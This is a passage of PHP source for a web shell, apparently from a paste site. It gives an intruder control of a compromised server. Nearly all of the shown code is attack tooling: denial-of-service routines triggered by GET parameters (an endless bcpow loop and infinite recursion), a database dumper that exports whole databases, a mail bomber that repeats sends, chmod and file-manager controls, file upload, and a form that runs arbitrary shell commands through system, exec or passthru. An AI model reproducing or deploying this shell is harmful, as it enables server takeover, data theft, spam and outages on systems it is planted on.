  1026. $junk=str_repeat("99999999999999999999999999999999999999999999999999",99999);
  1027. for($i=0;$i<2;){
  1028. $buff=bcpow($junk, '3', 2);
  1029. $buff=null;
  1030. }
  1031. }
  1032. dosserver();
  1033. }
  1034. if ($_GET['dosthisserver']=="2"){
  1035. function cx(){cx();}
  1036. cx();
  1037. }
  1038. if ($_GET['do']=="convert"){
  1039. $hash=null;
  1040. if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){
  1041. $hash=md5($_GET['stringtoh']);
  1042. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){
  1043. $hash=sha1($_GET['stringtoh']);
  1044. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){
  1045. $hash=crc32($_GET['stringtoh']);
  1046. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){
  1047. $hash=base64_encode($_GET['stringtoh']);
  1048. }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){
  1049. $hash=base64_decode($_GET['stringtoh']);
  1050. }
  1051. echo $head.'
  1052. <form method=get action="'.$me.'">
  1053. <p align="center">Convert<br><input type=hidden name=do value=convert>
  1054. <input name=stringtoh size=58><select name=hashtoh>
  1055. <option value="md5">MD5</option>
  1056. <option value="crc32">CRC32</option>
  1057. <option value="sha1">SHA1</option>
  1058. <option value="b64e">Base64 Encode!</option>
  1059. <option value="b64d">Base64 Decode!</option>
  1060. <br><textarea cols=60 rows=18>'.$hash.'</textarea><br><input type=submit value="Convert">
  1061.  
  1062. </p></form>'.$end;exit;}
  1063. if ($_GET['do']=="dump"){
  1064. echo $head.'<p align="center">';
  1065. echo '<table border=1 width=400 style="border-collapse: collapse" bordercolor=#C6C6C6 cellpadding=2><tr><td width=400 colspan=2 bgcolor=#F2F2F2><p align=center><b><font face=Arial size=2 color=#433934>Backup Database</font></b></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>DB Type:</font></td><td width=250 bgcolor=#EAEAEA><form method=post action="'.$me.'"><select name=method><option value="gzip">Gzip</option><option value="sql">Sql</option> </select></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Server:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=server size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Username:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=username size=35></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Password:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=password></td></tr><tr><td width=150 bgcolor=#EAEAEA><font face=Arial size=2>Data Base Name:</font></td><td width=250 bgcolor=#EAEAEA><input type=text name=dbname></td></tr><tr><td width=400 colspan=2 bgcolor=#EAEAEA><center><input type=submit value=" Dump! " ></td></tr></table></form></center></table>'.$end;exit;}
  1066. if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
  1067. $date = date("Y-m-d");
  1068. $dbserver = $_POST['server'];
  1069. $dbuser = $_POST['username'];
  1070. $dbpass = $_POST['password'];
  1071. $dbname = $_POST['dbname'];
  1072. $file = "Dump-$dbname-$date";
  1073. $method = $_POST['method'];
  1074. if ($method=='sql'){
  1075. $file="Dump-$dbname-$date.sql";
  1076. $fp=fopen($file,"w");
  1077. }else{
  1078. $file="Dump-$dbname-$date.sql.gz";
  1079. $fp = gzopen($file,"w");
  1080. }
  1081. function write($data) {
  1082. global $fp;
  1083. if ($_POST['method']=='sql'){
  1084. fwrite($fp,$data);
  1085. }else{
  1086. gzwrite($fp, $data);
  1087. }}
  1088. mysql_connect ($dbserver, $dbuser, $dbpass);
  1089. mysql_select_db($dbname);
  1090. $tables = mysql_query ("SHOW TABLES");
  1091. while ($i = mysql_fetch_array($tables)) {
  1092. $i = $i['Tables_in_'.$dbname];
  1093. $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
  1094. write($create['Create Table'].";\n\n");
  1095. $sql = mysql_query ("SELECT * FROM ".$i);
  1096. if (mysql_num_rows($sql)) {
  1097. while ($row = mysql_fetch_row($sql)) {
  1098. foreach ($row as $j => $k) {
  1099. $row[$j] = "'".mysql_escape_string($k)."'";
  1100. }
  1101. write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
  1102. }
  1103. }
  1104. }
  1105. if ($method=='sql'){
  1106. fclose ($fp);
  1107. }else{
  1108. gzclose($fp);}
  1109. header("Content-Disposition: attachment; filename=" . $file);
  1110. header("Content-Type: application/download");
  1111. header("Content-Length: " . filesize($file));
  1112. flush();
  1113.  
  1114. $fp = fopen($file, "r");
  1115. while (!feof($fp))
  1116. {
  1117. echo fread($fp, 65536);
  1118. flush();
  1119. }
  1120. fclose($fp);
  1121. }
  1122.  
  1123. if ($_GET['do']=="mail"){
  1124. echo $head.'
  1125. <form method=post action="'.$me.'">
  1126. <p align="center">
  1127. Address : <input type="text" name="admail" size="50"><br><br>Subject : <input type="text" name="submail" size="50"><br><br><textarea cols=70 rows=18 name=textmail>Text</textarea><br><br>Number For Send : <input type="text" name="numail" size="5" value=1><input type=submit value=Send!></form>'.$end;exit;}
  1128. if ($_POST['admail'] && $_POST['submail'] ){
  1129. for($mi=0;$mi<intval($_POST['numail']);$mi++){
  1130. mail($_POST['admail'], $_POST['submail'], $_POST['textmail']);}
  1131. }
  1132. if($_GET['do']=="db"){
  1133. echo $head;sqlclienT();echo $end;
  1134. exit;
  1135. }
  1136. if($_REQUEST['file2ch'] && $_REQUEST['chmodnow']){
  1137. $chmodnum2=$_REQUEST['chmodnow'];
  1138. chmod($_REQUEST['file2ch'],"0".$chmodnum2);
  1139. }
  1140. if($_GET['do']=="chmod"){
  1141. echo $head.$formg.$nowaddress."<p align=center><b>Chmod</b><br><input size=50 name=file2ch value='".$_REQUEST['address'].$_REQUEST['filename']."'> To <input name=chmodnow size=1 value=777><br><input type=submit value=Set></form>".$end;exit;
  1142.  
  1143. }
  1144. /* if($_GET['do']=="edit"){
  1145. if($_GET['filename']=="dir"){
  1146. if(is_readable($_GET['address'])){
  1147. chdir($_GET['address']);}else{alert("Permission Denied !");}
  1148.  
  1149. }} */
  1150. $araddresss=explode($slash,getcwd());
  1151. $matharrayy=count($araddresss)-1;
  1152. $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss);
  1153. for($countback=0;$countback<count($addr1backk);$countback++){
  1154. $arraybacke[$countback]=$slash.$addr1backk[$countback];
  1155. $backdirunixx=$backdirunixx.$slash.$addr1backk[$countback];
  1156. }
  1157. if ($slash=="\\"){
  1158. $countback=null;
  1159. $backdirwin=null;
  1160. for($countback=1;$countback<count($addr1backk);$countback++){
  1161. $backdirwin=$backdirwin."\\".$addr1backk[$countback];}
  1162. $backdirwin=$addr1backk[0].$backdirwin;
  1163. $backaddresss=$backdirwin;
  1164. }else{
  1165. $countback=null;
  1166. $backdirwin=null;
  1167. for($countback=1;$countback<count($addr1backk);$countback++){
  1168. $backdirwin=$backdirwin."/".$addr1backk[$countback];}
  1169. $backdirwin=$addr1backk[0].$backdirwin;
  1170. $backaddresss=$backdirwin;
  1171. $backaddresss=str_replace("\\","/",$backaddresss);
  1172. }
  1173. function calc_dir_size($path)
  1174. {
  1175. $size = 0;
  1176. if ($handle = opendir($path))
  1177. {
  1178. while (false !== ($entry = readdir($handle)))
  1179. {
  1180. $current_path = $path . '/' . $entry;
  1181. if ($entry != '.' && $entry != '..' && !is_link($current_path))
  1182. {
  1183. if (is_file($current_path))
  1184. $size += filesize($current_path);
  1185. elseif (is_dir($current_path))
  1186. $size = calc_dir_size($current_path);
  1187. }
  1188. }
  1189. }
  1190. closedir($handle);
  1191. return $size;
  1192. }
  1193. function openf($parsef){
  1194. global $basep,$slash;
  1195.  
  1196. if(strlen(strpos(getcwd(),$basep))>=1){
  1197. $rr=str_replace($basep,"",getcwd());
  1198. $rr=str_replace("\\","/",$rr);
  1199. $diropen='<a href="'.$rr."/".$parsef.'">'.$parsef.'</a>';
  1200. }else{
  1201. $diropen='<a href="?do=edit&address='.getcwd().$slash.'&filename='.$parsef.'">'.$parsef.'</a>';
  1202. }
  1203. return $diropen;
  1204. }
  1205. if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']){$ifget=$_POST['address'];}
  1206. if($cwd==''){$cwd=getcwd();}$nowaddress='<input type=hidden name=address value="'.$cwd.'">';
  1207. $ad=getcwd();
  1208. $hand=opendir("$ad");
  1209. $coi=0;
  1210. $coi2=0;
  1211.  
  1212. while (false !== ($fileee = readdir($hand))) {
  1213.  
  1214.  
  1215. if ($fileee != "." && $fileee != "..") {
  1216. if (filetype($fileee)=="dir"){
  1217. if ($coi %2){
  1218. $colort='"#e7e3de"';
  1219. }else{
  1220. $colort='"#e4e1de"';
  1221.  
  1222. }
  1223. $coi++;
  1224. $fil=$fil.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="1" dir="ltr">
  1225. <tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picdir. '" /> <a href="?address='.$cwd.$slash.$fileee.$slash.'">'.$fileee.'</b></span></td>
  1226. <td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"></td><td valign="top" height="19" width="22"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=dir&address='.$cwd.$slash.'&dirname='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
  1227. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=dir&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
  1228. ;}
  1229. else{
  1230.  
  1231. if ($coi2 %2){
  1232. $colort='"#e7e3de"';
  1233. }else{
  1234. $colort='"#e4e1de"';
  1235. }
  1236.  
  1237. $coi2++;
  1238. $file=$file.'<table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 0px" bordercolor="#CDCDCD" bgcolor='.$colort.' width="950" height="20" dir="ltr">
  1239. <tr onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$oo.'\';"><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><img src="data:image/png;base64,' .$picfile. '" /> '.openf($fileee).'</span></td>
  1240. <td valign="top" height="19" width="80"><font face="Tahoma" style="font-size: 9pt">'.sizee(filesize($fileee)).'</td><td valign="top" height="19" width="65"><font face="Tahoma" style="font-size: 9pt">'.date("y/m/d", filectime($fileee)).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt">'.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'</td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=edit&address='.$cwd.$slash.'&filename='.$fileee.'">Edit</a></td><td valign="top" height="19" width="23"><font face="Tahoma" style="font-size: 9pt"><a href="?do=down&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">DL</a></td><td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=rename&address='.$cwd.$slash.'&filename='.$fileee.'">Ren</a></td>
  1241. <td valign="top" height="19" width="30"><font face="Tahoma" style="font-size: 9pt"><a href="?do=delete&type=file&address='.$cwd.$slash.'&filename='.$fileee.'">Del</a></td></tr></table>'
  1242. ;}
  1243. }
  1244. }
  1245. echo $head.'
  1246. <font face="Tahoma" style="font-size: 6pt"><table cellpadding="0" cellspacing="0" style="border-style: dotted; border-width: 1px" bordercolor="#CDCDCD" width="950" height="20" dir="ltr">
  1247. <tr><td valign="top" height="19" width="842"><p align="left"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt"><font color=#4a7af4>Now Directory : '.getcwd()."<br>".printdrive().'<br><a href="?do=back&address='.$backaddresss.'"><font color=#000000>Back</span></td>
  1248. </tr></table>'.$fil.$file.'</table>
  1249. <table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5">
  1250. <tr>
  1251. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1252. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Command Execute : </font></td>
  1253. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input type=hidden name=address value='.getcwd().'><input name=command value=id size=50><input type=hidden name=do value=cmd size=50> <select name=execmethod>
  1254. <option value="system">System</option> <option value="exec">Exec</option> <option value="passthru">Passthru</option>
  1255. </select> <input type=submit value="Execute"></form></td></tr>
  1256. <tr>
  1257. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1258. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Change Dir : </font></td>
  1259. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=address value='.getcwd().$slash.' size=50>
  1260. <input type=submit value=Change></form></td></tr>
  1261. <tr>
  1262. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1263. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create Dir : </font></td>
  1264. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cdirname value='.getcwd().$slash.' size=50><input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
  1265. <tr>
  1266. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1267. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Create File : </font></td>
  1268. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input name=cfilename value='.getcwd().$slash.' size=50> <input type=hidden name=address value='.getcwd().'><input type=submit value=" Create "></form></td></tr>
  1269. <tr></form>
  1270. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1271. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Upload : </font></td>
  1272. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><form action="'.$me.'" method=post enctype=multipart/form-data>'.$nowaddress.'
  1273. <font face="Tahoma" style="font-size: 10pt"><input size=40 type=file name=filee > <input type=hidden name=address value='.getcwd().'>
  1274. <input type=submit value=Upload /></form></td></tr>
  1275. <tr>
  1276. <td width="200" align="right" valign="top" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080">
  1277. <font face="Tahoma" style="font-size: 10pt; font-weight:700"><br>'.$formg.'Copy File : </font></td>
  1278. <td width="750" style="border-left-width: 1px; border-right-width: 1px; border-top-width: 1px; border-bottom: 1px solid #808080"><input size=20 name=copyname><input type=hidden name=address value="'.getcwd().'"> To <input size=40 name=cpyto value="'.getcwd().$slash.'"> <input type=submit value =Copy></form></td></tr>
  1279. '.$end;
  1280. ?>
Add Comment
Please, Sign In to add comment